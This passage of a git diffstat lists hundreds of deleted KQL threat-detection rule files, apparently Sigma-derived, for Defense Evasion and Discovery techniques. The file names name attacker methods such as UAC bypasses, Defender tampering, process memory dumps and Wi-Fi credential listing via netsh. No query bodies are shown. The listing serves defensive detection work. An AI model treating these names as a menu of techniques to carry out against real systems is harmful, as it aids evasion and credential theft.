...word_Spraying_Attempt_Using_Dsacls.EXE.kql | 7 - ...ial_PendingFileRenameOperations_Tamper.kql | 7 - ...ersistence_Via_Custom_Protocol_Handler.kql | 7 - ...ersistence_Via_Event_Viewer_Events.asp.kql | 7 - .../Potential_Persistence_Via_GlobalFlags.kql | 7 - ...al_PowerShell_Command_Line_Obfuscation.kql | 7 - .../Potential_PowerShell_Downgrade_Attack.kql | 7 - ..._PowerShell_Execution_Policy_Tampering.kql | 7 - ...cution_Policy_Tampering_-_ProcCreation.kql | 7 - ...Potential_PowerShell_Execution_Via_DLL.kql | 9 - ...hell_Obfuscation_Via_Reversed_Commands.kql | 7 - ...ntial_PowerShell_Obfuscation_Via_WCHAR.kql | 7 - ...al_PrintNightmare_Exploitation_Attempt.kql | 7 - ...ation_Attempt_Via_.Exe.Local_Technique.kql | 7 - ..._Execution_Proxy_Via_CL_Invocation.ps1.kql | 7 - ...tential_Process_Injection_Via_Msra.EXE.kql | 7 - ...y_Key_Abuse_For_Binary_Proxy_Execution.kql | 7 - ...Abuse_For_Binary_Proxy_Execution_-_REG.kql | 7 - ...aunch.EXE_Binary_Proxy_Execution_Abuse.kql | 7 - .../Potential_Qakbot_Registry_Activity.kql | 7 - ...thorized_MBR_Tampering_Via_Bcdedit.EXE.kql | 7 - .../Potential_Rcdll.DLL_Sideloading.kql | 7 - ...ger_Content_Execution_Via_WerFault.EXE.kql | 7 - ...ntial_Register_App.Vbs_LOLScript_Abuse.kql | 7 - ...tial_Regsvr32_Commandline_Flag_Anomaly.kql | 7 - ....DLL_Sideloading_From_Default_Location.kql | 7 - ..._Sideloading_From_Non-Default_Location.kql | 7 - .../Potential_RoboForm.DLL_Sideloading.kql | 7 - ...dll32_Execution_With_DLL_Stored_In_ADS.kql | 7 - ...xy_Execution_Via_CL_Mutexverifiers.ps1.kql | 7 - ..._ShellDispatch.DLL_Functionality_Abuse.kql | 7 - ...otential_ShellDispatch.DLL_Sideloading.kql | 7 - ..._Bypass_Via_Windows_Developer_Features.kql | 7 - ..._Windows_Developer_Features_-_Registry.kql | 7 - .../Potential_SmadHook.DLL_Sideloading.kql | 7 - ...ential_SolidPDFCreator.DLL_Sideloading.kql | 7 - ...tial_Suspicious_Activity_Using_SeCEdit.kql | 7 - ...Potential_Suspicious_Mofcomp_Execution.kql | 10 - ...ous_Registry_File_Imported_Via_Reg.EXE.kql | 7 - ...Windows_Feature_Enabled_-_ProcCreation.kql | 9 - ...otential_SysInternals_ProcDump_Evasion.kql | 7 - ..._Sideloading_From_Non_System_Locations.kql | 7 - ..._RDP_Related_Registry_Keys_Via_Reg.EXE.kql | 7 - ...pering_With_Security_Products_Via_WMIC.kql | 7 - .../Potential_UAC_Bypass_Via_Sdclt.EXE.kql | 7 - .../Potential_Vivaldi_elf.DLL_Sideloading.kql | 7 - .../Potential_WWlib.DLL_Sideloading.kql | 7 - .../Potential_Waveedit.DLL_Sideloading.kql | 7 - ...azuh_Security_Platform_DLL_Sideloading.kql | 7 - ...t_ReflectDebugger_Registry_Value_Abuse.kql | 7 - .../Potential_Winnti_Dropper_Activity.kql | 7 - .../Potential_appverifUI.DLL_Sideloading.kql | 7 - ...e_Permissions_Granted_Using_Dsacls.EXE.kql | 7 - ...ASP.NET_Compilation_Via_AspNetCompiler.kql | 7 - ...y_Suspicious_CMD_Shell_Output_Redirect.kql | 9 - ...ally_Suspicious_Cabinet_File_Expansion.kql | 7 - ...ous_Call_To_Win32_NTEventlogFile_Class.kql | 7 - ...Child_Process_Of_ClickOnce_Application.kql | 7 - ...icious_Child_Process_Of_DiskShadow.EXE.kql | 7 - ...y_Suspicious_Child_Process_Of_Regsvr32.kql | 7 - ...lly_Suspicious_Child_Process_Of_VsCode.kql | 7 - ...ious_Child_Process_of_KeyScrambler.exe.kql | 7 - ...icious_DLL_Registered_Via_Odbcconf.EXE.kql | 7 - ...esktop_Background_Change_Using_Reg.EXE.kql | 9 - ...Desktop_Background_Change_Via_Registry.kql | 9 - ..._Suspicious_Event_Viewer_Child_Process.kql | 7 - ..._Suspicious_GoogleUpdate_Child_Process.kql | 7 - ...ocument_Executed_From_Trusted_Location.kql | 7 - ...ly_Suspicious_Regsvr32_HTTP_IP_Pattern.kql | 7 - ...tentially_Suspicious_Rundll32_Activity.kql | 7 - ...tially_Suspicious_Windows_App_Activity.kql | 7 - ..._Suspicious_Wuauclt_Network_Connection.kql | 9 - ...Base64_Encoded_FromBase64String_Cmdlet.kql | 7 - ...werShell_Base64_Encoded_Invoke_Keyword.kql | 7 - ...ase64_Encoded_Reflective_Assembly_Load.kql | 7 - .../PowerShell_Base64_Encoded_WMI_Classes.kql | 7 - ...owerShell_Console_History_Logs_Deleted.kql | 7 - ...Core_DLL_Loaded_Via_Office_Application.kql | 7 - ...ng_Disabled_Via_Registry_Key_Tampering.kql | 7 - ...l_Script_Change_Permission_Via_Set-Acl.kql | 7 - .../PowerShell_Set-Acl_On_Windows_Folder.kql | 7 - ...ell_Base64_Encoded_MpPreference_Cmdlet.kql | 7 - ...wershell_Defender_Disable_Scan_Feature.kql | 7 - .../Powershell_Defender_Exclusion.kql | 7 - ...l_Token_Obfuscation_-_Process_Creation.kql | 7 - Defense Evasion/Powerup_Write_Hijack_DLL.kql | 10 - Defense Evasion/Prefetch_File_Deleted.kql | 7 - .../PrintBrm_ZIP_Creation_of_Extraction.kql | 7 - Defense Evasion/Procdump_Execution.kql | 7 - ...ss_Access_via_TrolleyExpress_Exclusion.kql | 7 - ...rocess_Creation_Using_Sysnative_Folder.kql | 7 - .../Process_Memory_Dump_Via_Comsvcs.DLL.kql | 7 - .../Process_Memory_Dump_Via_Dotnet-Dump.kql | 8 - ...ocess_Proxy_Execution_Via_Squirrel.EXE.kql | 8 - .../Proxy_Execution_Via_Explorer.exe.kql | 7 - .../Proxy_Execution_Via_Wuauclt.EXE.kql | 7 - ...nt_File_Dropped_In_Suspicious_Location.kql | 7 - .../Pubprn.vbs_Proxy_Execution.kql | 7 - ...ython_Image_Load_By_Non-Python_Process.kql | 7 - .../RDP_Connection_Allowed_Via_Netsh.EXE.kql | 7 - ...e_Creation_From_Suspicious_Application.kql | 7 - ...rt_Forwarding_Rule_Added_Via_Netsh.EXE.kql | 7 - .../RDP_Sensitive_Settings_Changed.kql | 9 - ...RDP_Sensitive_Settings_Changed_to_Zero.kql | 9 - .../REGISTER_APP.VBS_Proxy_Execution.kql | 7 - Defense Evasion/Raccine_Uninstall.kql | 7 - ..._Winnti_Playbook_Registry_Manipulation.kql | 7 - ...iating_Network_Connection_To_Public_IP.kql | 7 - Defense Evasion/Reg_Add_Suspicious_Paths.kql | 7 - .../Registry_Explorer_Policy_Modification.kql | 7 - .../Registry_Hide_Function_from_User.kql | 7 - .../Registry_Modification_Via_Regini.EXE.kql | 7 - ...y_Persistence_via_Service_in_Safe_Mode.kql | 7 - ...ecution_With_Suspicious_File_Extension.kql | 7 - ..._DLL_Execution_With_Uncommon_Extension.kql | 7 - ...cution_From_Highly_Suspicious_Location.kql | 7 - ...ion_From_Potential_Suspicious_Location.kql | 7 - ...ablement_Abuse_Via_AtomicTestHarnesses.kql | 7 - ..._RURAT_Execution_From_Unusual_Location.kql | 7 - .../Remote_Code_Execute_via_Winrm.vbs.kql | 7 - .../Remote_File_Download_Via_Findstr.EXE.kql | 8 - .../Remote_XSL_Execution_Via_Msxsl.EXE.kql | 7 - ...Hosted_HTA_File_Executed_Via_Mshta.EXE.kql | 7 - ...Removal_Of_AMSI_Provider_Registry_Keys.kql | 7 - ...Value_to_Hide_Schedule_Task_-_Registry.kql | 7 - ...Value_to_Hide_Schedule_Task_-_Registry.kql | 7 - ..._Potential_COM_Hijacking_Registry_Keys.kql | 9 - .../Renamed_AutoHotkey.EXE_Execution.kql | 7 - .../Renamed_CURL.EXE_Execution.kql | 7 - .../Renamed_CreateDump_Utility_Execution.kql | 7 - Defense Evasion/Renamed_FTP.EXE_Execution.kql | 7 - .../Renamed_Jusched.EXE_Execution.kql | 7 - .../Renamed_Mavinject.EXE_Execution.kql | 7 - .../Renamed_MegaSync_Execution.kql | 7 - .../Renamed_Msdt.EXE_Execution.kql | 7 - .../Renamed_NirCmd.EXE_Execution.kql | 7 - .../Renamed_Office_Binary_Execution.kql | 7 - .../Renamed_PingCastle_Binary_Execution.kql | 7 - Defense Evasion/Renamed_Plink_Execution.kql | 7 - .../Renamed_ProcDump_Execution.kql | 7 - ...Remote_Utilities_RAT_(RURAT)_Execution.kql | 7 - .../Renamed_Vmnat.exe_Execution.kql | 7 - ...sponse_File_Execution_Via_Odbcconf.EXE.kql | 7 - ...ctedAdminMode_Registry_Value_Tampering.kql | 10 - ...egistry_Value_Tampering_-_ProcCreation.kql | 10 - ...tificate_Installed_From_Susp_Locations.kql | 7 - .../RunDLL32_Spawning_Explorer.kql | 7 - ...un_Once_Task_Configuration_in_Registry.kql | 7 - ...sk_Execution_as_Configured_in_Registry.kql | 7 - .../Run_PowerShell_Script_from_ADS.kql | 7 - ...ll_Script_from_Redirected_Input_Stream.kql | 7 - ..._Execution_With_Uncommon_DLL_Extension.kql | 7 - ...ecution_Without_CommandLine_Parameters.kql | 7 - .../Rundll32_InstallScreenSaver_Execution.kql | 7 - .../Rundll32_Internet_Connection.kql | 7 - .../Rundll32_Spawned_Via_Explorer.EXE.kql | 7 - .../Rundll32_UNC_Path_Execution.kql | 7 - Defense Evasion/SCR_File_Write_Event.kql | 7 - ...ent_Tools_PowerShell_Session_Detection.kql | 9 - ...eBoot_Registry_Key_Deleted_Via_Reg.EXE.kql | 7 - .../ScreenSaver_Registry_Key_Set.kql | 7 - ...tics_Turn_Off_Check_Enabled_-_Registry.kql | 7 - ...nhost_Calling_Suspicious_Child_Process.kql | 7 - .../Security_Service_Disabled_Via_Reg.EXE.kql | 7 - ...E_From_Potentially_Suspicious_Location.kql | 9 - ...ted_In_Potentially_Suspicious_Location.kql | 10 - .../Service_Binary_in_Suspicious_Folder.kql | 7 - ...DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql | 7 - ...rvice_Registry_Key_Deleted_Via_Reg.EXE.kql | 7 - ...curity_Descriptor_Tampering_Via_Sc.EXE.kql | 7 - ...Type_Change_Via_PowerShell_Set-Service.kql | 7 - .../Service_StartupType_Change_Via_Sc.EXE.kql | 7 - ...Files_as_System_Files_Using_Attrib.EXE.kql | 8 - ...tion_Using_Operating_Systems_Utilities.kql | 7 - ..._DLL_Execution_in_Suspicious_Directory.kql | 7 - .../Shell_Open_Registry_Keys_Manipulation.kql | 7 - Defense Evasion/ShimCache_Flush.kql | 7 - Defense Evasion/Sideloading_Link.EXE.kql | 7 - .../Start_of_NT_Virtual_DOS_Machine.kql | 7 - Defense Evasion/Suspect_Svchost_Activity.kql | 7 - ...spicious_Advpack_Call_Via_Rundll32.EXE.kql | 7 - ...ous_AgentExecutor_PowerShell_Execution.kql | 7 - ...lication_Allowed_Through_Exploit_Guard.kql | 7 - ...us_Cabinet_File_Execution_Via_Msdt.EXE.kql | 7 - .../Suspicious_Calculator_Usage.kql | 8 - .../Suspicious_Call_by_Ordinal.kql | 7 - ...Suspicious_Child_Process_Of_BgInfo.EXE.kql | 7 - ...Suspicious_Child_Process_Of_Wermgr.EXE.kql | 7 - ...icious_Child_Process_of_AspNetCompiler.kql | 7 - .../Suspicious_CodePage_Switch_Via_CHCP.kql | 7 - .../Suspicious_Control_Panel_DLL_Load.kql | 7 - ...cious_Copy_From_or_To_System_Directory.kql | 9 - .../Suspicious_Creation_with_Colorcpl.kql | 7 - Defense Evasion/Suspicious_Csi.exe_Usage.kql | 7 - .../Suspicious_CustomShellHost_Execution.kql | 7 - .../Suspicious_DLL_Loaded_via_CertOC.EXE.kql | 7 - ...Diantz_Alternate_Data_Stream_Execution.kql | 7 - .../Suspicious_Double_Extension_Files.kql | 7 - ..._Download_From_Direct_IP_Via_Bitsadmin.kql | 7 - ...rom_File-Sharing_Website_Via_Bitsadmin.kql | 7 - .../Suspicious_Download_Via_Certutil.EXE.kql | 7 - .../Suspicious_DumpMinitool_Execution.kql | 7 - ...Reflection_Assembly_Load_Function_Call.kql | 7 - ...vironment_Variable_Has_Been_Registered.kql | 7 - ...Eventlog_Clear_or_Configuration_Change.kql | 7 - .../Suspicious_Executable_File_Creation.kql | 9 - ..._Execution_From_GUID_Like_Folder_Names.kql | 7 - ...s_Execution_of_InstallUtil_Without_Log.kql | 7 - .../Suspicious_Extexport_Execution.kql | 7 - ...trac32_Alternate_Data_Stream_Execution.kql | 7 - ...s_File_Created_Via_OneNote_Application.kql | 7 - ..._Activity_From_Fake_Recycle.Bin_Folder.kql | 7 - ...le_Creation_In_Uncommon_AppData_Folder.kql | 7 - ...loaded_From_Direct_IP_Via_Certutil.EXE.kql | 7 - ..._File-Sharing_Website_Via_Certutil.EXE.kql | 7 - ...ile_Encoded_To_Base64_Via_Certutil.EXE.kql | 7 - ...Suspicious_Files_in_Default_GPO_Folder.kql | 7 - Defense Evasion/Suspicious_GUP_Usage.kql | 7 - .../Suspicious_Get-Variable.exe_Creation.kql | 10 - .../Suspicious_HH.EXE_Execution.kql | 7 - ...h_IntegrityLevel_Conhost_Legacy_Option.kql | 7 - ...IIS_URL_GlobalRules_Rewrite_Via_AppCmd.kql | 7 - ...ous_JavaScript_Execution_Via_Mshta.EXE.kql | 7 - ...ious_LNK_Double_Extension_File_Created.kql | 8 - .../Suspicious_MSDT_Parent_Process.kql | 7 - .../Suspicious_MSHTA_Child_Process.kql | 7 - ...picious_Microsoft_Office_Child_Process.kql | 7 - ...d_Execution_By_Uncommon_Parent_Process.kql | 7 - .../Suspicious_MsiExec_Embedding_Parent.kql | 7 - ...spicious_Msiexec_Execute_Arbitrary_DLL.kql | 9 - ...xec_Quiet_Install_From_Remote_Location.kql | 7 - ...twork_Connection_Binary_No_CommandLine.kql | 7 - .../Suspicious_Obfuscated_PowerShell_Code.kql | 7 - ...ous_PROCEXP152.sys_File_Created_In_TMP.kql | 9 - ...Parent_Double_Extension_File_Execution.kql | 7 - ...eyboard_Layout_IME_File_Registry_Value.kql | 10 - ...vocations_-_Specific_-_ProcessCreation.kql | 7 - ...xecution_To_Change_Lock_Screen_Timeout.kql | 7 - ...Execution_From_Fake_Recycle.Bin_Folder.kql | 7 - .../Suspicious_Process_Parents.kql | 7 - .../Suspicious_Process_Start_Locations.kql | 7 - ..._Whitelisted_In_Firewall_Via_Netsh.EXE.kql | 7 - ...uspicious_Provlaunch.EXE_Child_Process.kql | 7 - .../Suspicious_RASdial_Activity.kql | 7 - .../Suspicious_Recursive_Takeown.kql | 7 - ...y_Modification_From_ADS_Via_Regini.EXE.kql | 7 - ...s_Regsvr32_Execution_From_Remote_Share.kql | 7 - ...sponse_File_Execution_Via_Odbcconf.EXE.kql | 7 - ...us_Rundll32_Activity_Invoking_Sys_File.kql | 7 - ...undll32_Execution_With_Image_Extension.kql | 7 - ...ious_Rundll32_Invoking_Inline_VBScript.kql | 7 - ...picious_Rundll32_Setupapi.dll_Activity.kql | 7 - .../Suspicious_Runscripthelper.exe.kql | 7 - ...uspicious_SYSTEM_User_Process_Creation.kql | 7 - ...Task_Creation_via_Masqueraded_XML_File.kql | 7 - .../Suspicious_Service_Binary_Directory.kql | 7 - .../Suspicious_Service_Installed.kql | 9 - .../Suspicious_Sigverif_Execution.kql | 7 - .../Suspicious_Splwow64_Without_Params.kql | 7 - .../Suspicious_Usage_Of_ShellExec_RunDLL.kql | 7 - .../Suspicious_Userinit_Child_Process.kql | 7 - .../Suspicious_VBoxDrvInst.exe_Parameters.kql | 10 - ...ous_Volume_Shadow_Copy_VSS_PS.dll_Load.kql | 7 - ...ous_Volume_Shadow_Copy_Vssapi.dll_Load.kql | 7 - ...s_Volume_Shadow_Copy_Vsstrace.dll_Load.kql | 7 - ...t_Command_With_AgentExtensionPath_Load.kql | 7 - ...ious_WMIC_Execution_Via_Office_Process.kql | 7 - ...der_Folder_Exclusion_Added_Via_Reg.EXE.kql | 7 - ...der_Registry_Key_Tampering_Via_Reg.EXE.kql | 7 - .../Suspicious_Windows_Service_Tampering.kql | 7 - ...race_ETW_Session_Tamper_Via_Logman.EXE.kql | 7 - ...ous_Windows_Update_Agent_Empty_Cmdline.kql | 8 - .../Suspicious_WmiPrvSE_Child_Process.kql | 7 - ...cious_Workstation_Locking_via_Rundll32.kql | 7 - ...ious_X509Enrollment_-_Process_Creation.kql | 7 - ...picious_XOR_Encoded_PowerShell_Command.kql | 7 - .../Suspicious_ZipExec_Execution.kql | 7 - ...rver_Execute_Arbitrary_PowerShell_Code.kql | 7 - ..._VBS_Execute_Arbitrary_PowerShell_Code.kql | 7 - ...ternals_PsSuspend_Suspicious_Execution.kql | 7 - .../Sysmon_Configuration_Update.kql | 7 - .../Sysmon_Driver_Altitude_Change.kql | 9 - .../Sysmon_Driver_Unloaded_Via_Fltmc.EXE.kql | 7 - ...nel_Item_Loaded_From_Uncommon_Location.kql | 7 - ...System_File_Execution_Location_Anomaly.kql | 7 - ...r_Windows_Defender_Remove-MpPreference.kql | 7 - .../Tamper_With_Sophos_AV_Registry_Keys.kql | 7 - .../Taskkill_Symantec_Endpoint_Protection.kql | 10 - Defense Evasion/Taskmgr_as_LOCAL_SYSTEM.kql | 7 - Defense Evasion/Tasks_Folder_Evasion.kql | 10 - .../TeamViewer_Log_File_Deleted.kql | 7 - ..._Connection_History_Cleared_-_Registry.kql | 7 - .../Third_Party_Software_DLL_Sideloading.kql | 7 - .../Time_Travel_Debugging_Utility_Usage.kql | 7 - ...Travel_Debugging_Utility_Usage_-_Image.kql | 7 - .../Tomcat_WebServer_Logs_Deleted.kql | 7 - ...rust_Access_Disable_For_VBApplications.kql | 7 - .../TrustedPath_UAC_Bypass_Pattern.kql | 7 - ...ass_Abusing_Winsat_Path_Parsing_-_File.kql | 7 - ..._Abusing_Winsat_Path_Parsing_-_Process.kql | 7 - ...Abusing_Winsat_Path_Parsing_-_Registry.kql | 7 - ...AC_Bypass_Tools_Using_ComputerDefaults.kql | 7 - ...Bypass_Using_.NET_Code_Profiler_on_MMC.kql | 7 - .../UAC_Bypass_Using_ChangePK_and_SLUI.kql | 7 - ...pass_Using_Consent_and_Comctl32_-_File.kql | 7 - ...s_Using_Consent_and_Comctl32_-_Process.kql | 7 - .../UAC_Bypass_Using_Disk_Cleanup.kql | 7 - Defense Evasion/UAC_Bypass_Using_DismHost.kql | 7 - Defense Evasion/UAC_Bypass_Using_EventVwr.kql | 7 - ..._Bypass_Using_Event_Viewer_RecentViews.kql | 7 - .../UAC_Bypass_Using_IDiagnostic_Profile.kql | 7 - ...ypass_Using_IDiagnostic_Profile_-_File.kql | 7 - .../UAC_Bypass_Using_IEInstal_-_File.kql | 7 - .../UAC_Bypass_Using_IEInstal_-_Process.kql | 7 - .../UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql | 7 - ...ing_MSConfig_Token_Modification_-_File.kql | 7 - ..._MSConfig_Token_Modification_-_Process.kql | 7 - ...Bypass_Using_NTFS_Reparse_Point_-_File.kql | 7 - ...ass_Using_NTFS_Reparse_Point_-_Process.kql | 7 - .../UAC_Bypass_Using_PkgMgr_and_DISM.kql | 7 - ...pass_Using_Windows_Media_Player_-_File.kql | 7 - ...s_Using_Windows_Media_Player_-_Process.kql | 7 - ..._Using_Windows_Media_Player_-_Registry.kql | 7 - Defense Evasion/UAC_Bypass_Via_Wsreset.kql | 7 - Defense Evasion/UAC_Bypass_WSReset.kql | 7 - Defense Evasion/UAC_Bypass_With_Fake_DLL.kql | 7 - .../UAC_Bypass_via_Event_Viewer.kql | 7 - Defense Evasion/UAC_Bypass_via_ICMLuaUtil.kql | 7 - Defense Evasion/UAC_Bypass_via_Sdclt.kql | 7 - Defense Evasion/UAC_Disabled.kql | 8 - Defense Evasion/UAC_Notification_Disabled.kql | 10 - .../UAC_Secure_Desktop_Prompt_Disabled.kql | 10 - ..._Persistence_Via_Wpbbin_-_FileCreation.kql | 7 - ...rsistence_Via_Wpbbin_-_ProcessCreation.kql | 7 - ...on_AddinUtil.EXE_CommandLine_Execution.kql | 8 - ...ncommon_Child_Process_Of_AddinUtil.EXE.kql | 8 - .../Uncommon_Child_Process_Of_Appvlp.EXE.kql | 11 - .../Uncommon_Child_Process_Of_BgInfo.EXE.kql | 7 - ...ommon_Child_Process_Of_Defaultpack.EXE.kql | 7 - ..._Child_Process_Spawned_By_Odbcconf.EXE.kql | 7 - ...eyboard_Layout_IME_File_Registry_Value.kql | 10 - ..._FileSystem_Load_Attempt_By_Format.com.kql | 8 - ..._File_Creation_By_Mysql_Daemon_Process.kql | 9 - ...icrosoft_Office_Trusted_Location_Added.kql | 7 - .../Uncommon_Svchost_Parent_Process.kql | 7 - ...pplications_Execution_Via_AtBroker.EXE.kql | 7 - .../Uninstall_Crowdstrike_Falcon_Sensor.kql | 7 - .../Uninstall_Sysinternals_Sysmon.kql | 7 - Defense Evasion/Unmount_Share_Via_Net.EXE.kql | 7 - ...allation_Attempt_Using_Add-AppxPackage.kql | 7 - .../Use_Icacls_to_Hide_File_to_Everyone.kql | 7 - .../Use_NTFS_Short_Name_in_Command_Line.kql | 7 - .../Use_NTFS_Short_Name_in_Image.kql | 7 - ...Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql | 7 - .../Use_Short_Name_Path_in_Command_Line.kql | 7 - .../Use_Short_Name_Path_in_Image.kql | 7 - Defense Evasion/Use_of_Remote.exe.kql | 7 - Defense Evasion/Use_of_Scriptrunner.exe.kql | 7 - Defense Evasion/Use_of_Setres.exe.kql | 7 - Defense Evasion/Use_of_TTDInject.exe.kql | 7 - .../Use_of_VSIISExeLauncher.exe.kql | 7 - .../Use_of_VisualUiaVerifyNative.exe.kql | 7 - Defense Evasion/Use_of_Wfc.exe.kql | 7 - .../Using_SettingSyncHost.exe_as_LOLBin.kql | 7 - .../UtilityFunctions.ps1_Proxy_Dll.kql | 7 - .../Verclsid.exe_Runs_COM_Object.kql | 7 - ...sual_Basic_Command_Line_Compiler_Usage.kql | 7 - ...PressAnyKey_Arbitrary_Binary_Execution.kql | 7 - ...ejsTools_PressAnyKey_Renamed_Execution.kql | 7 - .../WMIC_Loading_Scripting_Libraries.kql | 7 - Defense Evasion/WSL_Child_Process_Anomaly.kql | 7 - ...ab_Execution_From_Non_Default_Location.kql | 7 - ...digest_CredGuard_Registry_Modification.kql | 10 - .../Wdigest_Enable_UseLogonCredential.kql | 7 - .../Weak_or_Abused_Passwords_In_CLI.kql | 9 - ...s_Binaries_Write_Suspicious_Extensions.kql | 7 - ...dows_Defender_Definition_Files_Removed.kql | 7 - ...s_Defender_Exclusions_Added_-_Registry.kql | 7 - ...s_Defender_Service_Disabled_-_Registry.kql | 7 - ...ndows_Firewall_Disabled_via_PowerShell.kql | 7 - .../Windows_Kernel_Debugger_Execution.kql | 7 - ..._Processes_Suspicious_Parent_Directory.kql | 7 - ...Spooler_Service_Suspicious_Binary_Load.kql | 7 - .../Winget_Admin_Settings_Modification.kql | 7 - ...inlogon_AllowMultipleTSSessions_Enable.kql | 10 - ...EXE_Uncommon_Argument_Or_Child_Process.kql | 9 - .../Write_Protect_For_Storage_Disabled.kql | 9 - ...Of_Malicious_Files_To_The_Fonts_Folder.kql | 7 - ...mon_Locations_Via_PresentationHost.EXE.kql | 8 - .../XSL_Script_Execution_Via_WMIC.EXE.kql | 10 - ...XE_Execution_From_Non-Default_Location.kql | 9 - ...l_Cmdlets_Execution_-_ProccessCreation.kql | 7 - ...rectory_Structure_Export_Via_Csvde.EXE.kql | 7 - .../Advanced_IP_Scanner_-_File_Event.kql | 7 - Discovery/BloodHound_Collection_Files.kql | 7 - ...y_And_Export_Via_Get-ADComputer_Cmdlet.kql | 7 - ...ter_System_Reconnaissance_Via_Wmic.EXE.kql | 7 - .../Console_CodePage_Lookup_Via_CHCP.kql | 7 - .../Detected_Windows_Software_Discovery.kql | 7 - Discovery/DirLister_Execution.kql | 7 - Discovery/Discovery_of_a_System_Time.kql | 7 - .../Domain_Trust_Discovery_Via_Dsquery.kql | 7 - Discovery/DriverQuery.EXE_Execution.kql | 7 - ...merate_All_Information_With_Whoami.EXE.kql | 7 - ..._SubFolder_Enumeration_Via_Dir_Command.kql | 8 - ..._Configuration_Discovery_Via_Netsh.EXE.kql | 7 - Discovery/Fsutil_Drive_Enumeration.kql | 7 - ...kInfo.VBS_Reconnaissance_Script_Output.kql | 7 - ...esult_Display_Group_Policy_Information.kql | 7 - ...mbership_Reconnaissance_Via_Whoami.EXE.kql | 7 - Discovery/HackTool_-_Certify_Execution.kql | 7 - Discovery/HackTool_-_Certipy_Execution.kql | 7 - .../HackTool_-_CrackMapExec_Execution.kql | 7 - .../HackTool_-_SharpLDAPmonitor_Execution.kql | 7 - .../HackTool_-_SharpLdapWhoami_Execution.kql | 7 - Discovery/HackTool_-_SharpView_Execution.kql | 7 - .../HackTool_-_TruffleSnout_Execution.kql | 7 - Discovery/HackTool_-_WinPwn_Execution.kql | 8 - ...ting_Of_Wifi_Credentials_Via_Netsh.EXE.kql | 7 - Discovery/Local_Accounts_Discovery.kql | 7 - ...cal_Groups_Reconnaissance_Via_Wmic.EXE.kql | 11 - ...werShell_Commandlets_-_ProcessCreation.kql | 7 - Discovery/Network_Reconnaissance_Activity.kql | 7 - ...rk_Trace_Capture_Started_Via_Netsh.EXE.kql | 7 - Discovery/Nltest.EXE_Execution.kql | 7 - Discovery/Obfuscated_IP_Download_Activity.kql | 7 - Discovery/Obfuscated_IP_Via_CLI.kql | 7 - .../PUA_-_AdFind_Suspicious_Execution.kql | 7 - Discovery/PUA_-_Adidnsdump_Execution.kql | 9 - .../PUA_-_Advanced_IP_Scanner_Execution.kql | 7 - .../PUA_-_Advanced_Port_Scanner_Execution.kql | 7 - Discovery/PUA_-_Crassus_Execution.kql | 7 - Discovery/PUA_-_Seatbelt_Execution.kql | 7 - .../PUA_-_SoftPerfect_Netscan_Execution.kql | 9 - ...veDirectory_Enumeration_Via_AdFind.EXE.kql | 7 - .../Permission_Check_Via_Accesschk.EXE.kql | 7 - ...eration_Using_AD_Module_-_ProcCreation.kql | 7 - ...And_Service_Reconnaissance_Via_Reg.EXE.kql | 7 - ...tial_Discovery_Activity_Via_Dnscmd.EXE.kql | 7 - ..._Sniffing_Activity_Using_Network_Tools.kql | 10 - ...l_Recon_Activity_Using_DriverQuery.EXE.kql | 7 - ...otential_Recon_Activity_Via_Nltest.EXE.kql | 7 - ...nce_Activity_Via_GatherNetworkInfo.VBS.kql | 7 - ...tial_Suspicious_Activity_Using_SeCEdit.kql | 7 - ...con_Activity_Using_Log_Query_Utilities.kql | 9 - Discovery/Python_Initiated_Connection.kql | 7 - ...on_Command_Output_Piped_To_Findstr.EXE.kql | 8 - ...Remote_Utilities_RAT_(RURAT)_Execution.kql | 7 - Discovery/Renamed_Whoami_Execution.kql | 7 - ..._Privileges_Enumeration_Via_Whoami.EXE.kql | 7 - ...y_Tools_Keyword_Lookup_Via_Findstr.EXE.kql | 9 - ..._And_Session_Enumeration_Using_Net.EXE.kql | 7 - .../Suspicious_Execution_of_Hostname.kql | 7 - .../Suspicious_Execution_of_Systeminfo.kql | 7 - ..._Reconnaissance_Activity_Using_Net.EXE.kql | 9 - .../Suspicious_Kernel_Dump_Using_Dtrace.kql | 7 - Discovery/Suspicious_Network_Command.kql | 7 - ...k_Connection_to_IP_Lookup_Service_APIs.kql | 7 - Discovery/Suspicious_Query_of_MachineGUID.kql | 7 - ...vity_Using_Get-LocalGroupMember_Cmdlet.kql | 7 - ...nce_Activity_Via_GatherNetworkInfo.VBS.kql | 7 - Discovery/Suspicious_Scan_Loop_Network.kql | 7 - Discovery/Suspicious_Use_of_PsLogList.kql | 7 - Discovery/Suspicious_Where_Execution.kql | 10 - .../Sysinternals_PsService_Execution.kql | 7 - .../Sysinternals_PsSuspend_Execution.kql | 7 - ...ault_Driver_Altitude_Using_Findstr.EXE.kql | 7 - ...And_Volume_Reconnaissance_Via_Wmic.EXE.kql | 10 - ...work_Connections_Discovery_Via_Net.EXE.kql | 7 - ...tem_Information_Discovery_Via_Wmic.EXE.kql | 11 - Discovery/Use_of_W32tm_as_Timer.kql | 7 - ...overy_And_Export_Via_Get-ADUser_Cmdlet.kql | 7 - Discovery/WhoAmI_as_Parameter.kql | 7 - Discovery/Whoami.EXE_Execution_Anomaly.kql | 7 - ....EXE_Execution_From_Privileged_Process.kql | 7 - ...hoami.EXE_Execution_With_Output_Option.kql | 7 - Discovery/Whoami_Utility_Execution.kql | 7 - ...l_Cmdlets_Execution_-_ProccessCreation.kql | 7 - ...l_Sideloading_From_Suspicious_Location.kql | 7 - ...eros_DLL_Loaded_Via_Office_Application.kql | 7 - ...sing_DLL_Loaded_Via_Office_Application.kql | 7 - ...Add_Insecure_Download_Source_To_Winget.kql | 9 - .../Add_New_Download_Source_To_Winget.kql | 7 - ...spicious_New_Download_Source_To_Winget.kql | 7 - ...ndows_Capability_Via_PowerShell_Cmdlet.kql | 7 - .../Application_Removed_Via_Wmic.EXE.kql | 7 - .../Application_Terminated_Via_Wmic.EXE.kql | 7 - ...ary_Binary_Execution_Using_GUP_Utility.kql | 7 - .../Arbitrary_Command_Execution_Using_WSL.kql | 7 - ...bitrary_File_Download_Via_IMEWDBLD.EXE.kql | 7 - ...ary_File_Download_Via_MSEDGE_PROXY.EXE.kql | 7 - ...bitrary_File_Download_Via_MSOHTMED.EXE.kql | 7 - .../Arbitrary_File_Download_Via_MSPUB.EXE.kql | 7 - ...File_Download_Via_PresentationHost.EXE.kql | 7 - ...bitrary_File_Download_Via_Squirrel.EXE.kql | 8 - ...Arbitrary_MSI_Download_Via_Devinit.EXE.kql | 7 - 